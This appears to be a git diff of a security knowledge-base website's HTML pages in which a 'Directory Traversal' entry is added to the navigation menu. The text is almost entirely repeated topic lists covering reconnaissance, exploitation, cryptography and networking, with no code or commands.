      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -248,22 +248,6 @@

DNS Zone - - diff --git a/docs/Reconnaissance/Enumeration/FTP Enumeration (21).html b/docs/Reconnaissance/Enumeration/FTP Enumeration (21).html index 8a7524bb..bf539588 100644 --- a/docs/Reconnaissance/Enumeration/FTP Enumeration (21).html +++ b/docs/Reconnaissance/Enumeration/FTP Enumeration (21).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -183,22 +183,6 @@

Introduction - - diff --git a/docs/Reconnaissance/Enumeration/LDAP Enumeration (389, 636, 3268, 3269).html b/docs/Reconnaissance/Enumeration/LDAP Enumeration (389, 636, 3268, 3269).html index 5ab786b6..1169f625 100644 --- a/docs/Reconnaissance/Enumeration/LDAP Enumeration (389, 636, 3268, 3269).html +++ b/docs/Reconnaissance/Enumeration/LDAP Enumeration (389, 636, 3268, 3269).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
